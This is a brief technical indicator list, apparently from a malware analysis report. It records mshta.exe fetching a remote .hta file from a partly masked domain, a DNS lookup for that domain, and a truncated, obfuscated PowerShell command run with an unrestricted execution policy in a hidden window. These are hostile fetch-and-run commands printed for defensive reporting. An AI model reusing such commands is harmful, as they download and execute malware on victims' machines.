Technical Information
- '<SYSTEM32>\mshta.exe' http://au#####icate.yik0to.com/out-2100816008.hta
- http://au#####icate.yik0to.com/out-2100816008.hta
- DNS ASK au#####icate.yik0to.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted $aoetff = $Null;function meouxm($xgwrvxe){return -join($xgwrvxe-split'(..)'|? L*h|%{[char]+('0x'+$_)})};function fehpiv($lqovh, $vkkwco){$hocoh = @('TLS12', 'TLS11...' (with hidden window)